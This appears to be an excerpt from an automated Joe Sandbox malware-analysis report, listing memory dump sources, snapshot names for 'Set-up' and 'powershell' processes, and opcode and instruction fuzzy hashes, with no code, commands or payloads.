                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2418817a5273c47f00104cd0c675fa4cefa759a094a4241fde7dad8722be5c78
                                                                                                                                                                                                                                                              • Instruction ID: b865321d51f36aef533918adf5e233cac2e37d5943dd364ace7e4dc4b7ccad7d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2418817a5273c47f00104cd0c675fa4cefa759a094a4241fde7dad8722be5c78
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8515BB2A202215BD724CB64C85177773A2EFD6314F18826DE8958B3ECEF3B9509C752
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 88826ca0a6506394c41496adea131636c38d49876ac691af5bbdd5b0cf8aa2bb
                                                                                                                                                                                                                                                              • Instruction ID: 68874498c303d0bec3e3794ec742c42021abdc2f17d755de131bb6c882168a42
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88826ca0a6506394c41496adea131636c38d49876ac691af5bbdd5b0cf8aa2bb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81416D62A663024BD3198A68D8E0AB677C2CBF5230F0FC27DD4520B7D9E665590FD350
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 8d1cb1bdb1e5a66eba4fd499b26e5ad636dad662b2531e8a03945efeabb487d3
                                                                                                                                                                                                                                                              • Instruction ID: 88f6532a045a3c9d62fba828590918ea10054520b7b4ef69105b81a81b98dceb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d1cb1bdb1e5a66eba4fd499b26e5ad636dad662b2531e8a03945efeabb487d3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5131A4746202029BE314EF68DD60D3673E3FB9D325B688624D065CB5A8E730E962DA44
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
                                                                                                                                                                                                                                                              • Instruction ID: 498f5601ee122d546b5bb7004a2a74445457040793aa64b7608654e142a78dd2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6516E74E11209DFCB08CF88C590AAEB7B2FF98314F208199D915AB345D731AE91CFA0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 756ec1681b064b4aec3ada82aa32bf7e870998c689808459d6c49438982ef0a6
                                                                                                                                                                                                                                                              • Instruction ID: 7eb284a5c0f0dc567a9a9e14354d7dd96fd63364a70f6e23cb13bdf60bb28809
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 756ec1681b064b4aec3ada82aa32bf7e870998c689808459d6c49438982ef0a6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E31CAB0528305CAD320EF50D89066BB7E2EF82304F48895CF1829F358E3789545CB1B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 9d9e07e7978194d435bc6c36dc3693ee3ba5c2c2709575eaf5a0a93a458bb6d1
                                                                                                                                                                                                                                                              • Instruction ID: 404f89fbf096044036f9ce2f3ada134ba539071a23ce8e5c08ae66eecbc9d686
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d9e07e7978194d435bc6c36dc3693ee3ba5c2c2709575eaf5a0a93a458bb6d1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E121033972D0A107C714DE7AACE0967B7D3DBD730A72EC176DA84C775AC276980AC260
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 8a17541cfeabab7ca8bd0fe71eb8a58569a1620de09f05e44468094862142255
                                                                                                                                                                                                                                                              • Instruction ID: 3a80ad312ed64d8b4fc278bc7e3d73cc3a8cdcdd40fa12a35163fdaab93ef542
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a17541cfeabab7ca8bd0fe71eb8a58569a1620de09f05e44468094862142255
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 512133B16243018BE7158F69C545797FBE6AF86324F00C61DC8D897382D73AAC0ACF65
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
                                                                                                                                                                                                                                                              • Instruction ID: 734ccd52748d81e7cba06a601f6e2e432a50a309aae5ae65da6f21bf25c592bc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57018F77A113138B8724CE9CC4D0AABB3B4FF89794B1A445D95411B370DB329D198260
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 826eb97da17682511683eeb6c52fb375d814f0d0144f204077d5ebce35bdf9cf
                                                                                                                                                                                                                                                              • Instruction ID: f50a347450b2c1ff7418cc68b99d7f19b7597c8b2974e1f91d7cce320bfdf384
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 826eb97da17682511683eeb6c52fb375d814f0d0144f204077d5ebce35bdf9cf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBF049756103187BD1119B84AC40D37B7ADF7CE7ACF009328F92456164D332ED11D7A0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 21e51f148cd6a4beac52a65e31aa4c8185bc161e0cb5515423eb2367843d388a
                                                                                                                                                                                                                                                              • Instruction ID: fe296632a7facd370397ae29ebab83bdee6cf96d5ac862278e5d8e9978194e8e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21e51f148cd6a4beac52a65e31aa4c8185bc161e0cb5515423eb2367843d388a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84F0F474068642DFF719DF189C55A3177F2EF86304F2D4168E642971A5C321B821C704
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b93d5f52058c4a179cdcc56a6b5189a6caff73073d7215fbe25f0c71d3ff7e02
                                                                                                                                                                                                                                                              • Instruction ID: bb2ee810edec8716df10a87f3e5f63cbf1b3e975773dd3c04485dcde0721e6b4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b93d5f52058c4a179cdcc56a6b5189a6caff73073d7215fbe25f0c71d3ff7e02
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E401D67461A310ABD234DF54C9C0B7A73B5E78A310F906628E99457295C731EC05C77A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: e54b1023c60f1e4f185ccb4e24e2cd490a64a7ab9b68a6b8ad5b764e6596ef41
                                                                                                                                                                                                                                                              • Instruction ID: 069bad5ad81fa1b285667348b064bc38f1279c6e5112c040f0c5bfa9124d15ea
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e54b1023c60f1e4f185ccb4e24e2cd490a64a7ab9b68a6b8ad5b764e6596ef41
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAF08CE49D42006BEAA476906C82F3F326A9B72B01F044429EC4921285ED6639366A7B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                                                                                              • Instruction ID: 5255dd46bdc67d3e769a3a83da2041afb66b6436869c5f9a3782db3f453ff074
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7019634A11109EBCB14DF98C194AADB7F5EB59314F208199E8059B794C731AF81DB80
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: eb09bcfba1c5644bda3625c56debfcb8ad223da33ada4a2f1f55b810212580c8
                                                                                                                                                                                                                                                              • Instruction ID: 70d62bd2bd5dfd6a1ba03d9c0ea2efaf3718ca55c9a94dbf9a581dc9cab62e9e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb09bcfba1c5644bda3625c56debfcb8ad223da33ada4a2f1f55b810212580c8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDD05E84228B5F878B1B0ED914E0231AA660E0720DB0854BEE5C3AB486C66BC4469218
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                                                              • Instruction ID: 36432006c48793eb4f4d5a4052a9993e202ed399fc07c3533ef4e7f4e7faabca
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44D097B05083B20E57098D3400A043BFBF4EA43022B08119EE9C2F3008D320EC024368
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: d0d419fc7827e284debaab192e0aa29d8e407d8b73cf7e979b9531c6ae6ff008
                                                                                                                                                                                                                                                              • Instruction ID: 491cfdb17aebd270413f9dc8cffdaa96e544330334aa6ffcf9a5484a86fe9053
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0d419fc7827e284debaab192e0aa29d8e407d8b73cf7e979b9531c6ae6ff008
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFB092E1C53550A69A59AB502D068AAB4678D23611F0420B0C80622308AB17D21A88DF
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1906552651.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7120000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                              • API String ID: 0-2378468523
                                                                                                                                                                                                                                                              • Opcode ID: fc3fd062768571a9eca93dab14ea1b20cffcf7fede457b3eafc75af400348efa
                                                                                                                                                                                                                                                              • Instruction ID: 57a84318dfe9a02995cb743193f10131791fdcdf92d67781c8d9b894d675fb77
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc3fd062768571a9eca93dab14ea1b20cffcf7fede457b3eafc75af400348efa
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2328FB17042658FC72A8B39881076BBFA2AFC9310F1485ABD445CF3A1DB31CD62D7A1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1903318520.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_960000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: af5f00874c52aabcee1970b1df1c055d723b916807679db6e8da799b1ed01adc
                                                                                                                                                                                                                                                              • Instruction ID: 2e0e39f36bf79d57e3005feef4be82f0b0574c302fa263fb34321b44bb50687e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af5f00874c52aabcee1970b1df1c055d723b916807679db6e8da799b1ed01adc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3625874A002499FCB05CF98C594AAEFBF2FF89310F258559E815AB3A5C735EC81CB90
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1906552651.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7120000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 859af7512c039a2318d34508d030ccac464fd047174f73c794e8d5e37fa42cbd
                                                                                                                                                                                                                                                              • Instruction ID: e2b5d55cc09803124180d3788d721ce2f9cc02b4fcb13c6e270d7de182f91919
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 859af7512c039a2318d34508d030ccac464fd047174f73c794e8d5e37fa42cbd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE417DB5B10211CFCB39CF258451B2A7BB2AF8D348F194296D8018F2E1D731CD62D7A1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1903318520.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_960000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: cd6bc1ba82afc7c246ce15095858c06b2f4b05abbad621294733d3ce36b1d885
                                                                                                                                                                                                                                                              • Instruction ID: 5955ca30ccc856b74bf158872f60030bab6a46d99dbadcf0e0f450d4146d7352
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd6bc1ba82afc7c246ce15095858c06b2f4b05abbad621294733d3ce36b1d885
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41413AB4A00505CFCB05CF99C598AAAFBB1FF48310B25856AD515AB364C736FC91CF94
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1903318520.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_960000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2a4de539d4d2a49f5f1581dfba92fe2200eae93dd1aa1017d2fc5fa2917d2f0d
                                                                                                                                                                                                                                                              • Instruction ID: df8bd496d112003242585111cce61f94fa9e08873b59835606a1f88794aec888
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a4de539d4d2a49f5f1581dfba92fe2200eae93dd1aa1017d2fc5fa2917d2f0d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1217C74A092959FCB01DF6CD8909EABFB0FF4A310B158196D444EB352C735ED89CBA1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1903318520.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_960000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 450e2c71d8a9832979dc39a4e25b900af3f9377b7c336a9cd0c5b0db1c650e70
                                                                                                                                                                                                                                                              • Instruction ID: 15b30d1e882afff81bb351d4c980d8f30b76795a15d9bdbd8a5ec9852179016f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 450e2c71d8a9832979dc39a4e25b900af3f9377b7c336a9cd0c5b0db1c650e70
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12214DB4A042199FCB04CF5CC5809AEFBB4FF89310B15859AE815EB356C735ED45CBA1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1903138654.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_8ed000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 6c962990d7418447bedbc7b20eeb94dee8242f3d7bc6984b076838ac112c55c5
                                                                                                                                                                                                                                                              • Instruction ID: c949d85ee5b67307dce8917edeb64d473b941e1746a58b84e560c4c521fd7085
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c962990d7418447bedbc7b20eeb94dee8242f3d7bc6984b076838ac112c55c5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F001696100D3C09FD7124B268894652BFB8EF53224F0D84DBE888CF2A3C2699C49C772
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1903138654.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_8ed000_powershell.jbxd
Strings
Memory Dump Source
• Source File: 00000002.00000002.1906552651.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7120000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
• API String ID: 0-1608119003
Strings
Memory Dump Source
• Source File: 00000002.00000002.1906552651.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7120000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$tP^q$tP^q
• API String ID: 0-3859475322
Strings
Memory Dump Source
• Source File: 00000002.00000002.1906552651.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7120000_powershell.jbxd
Similarity
• API ID:
• String ID: $^q$$^q$$^q$$^q
• API String ID: 0-2125118731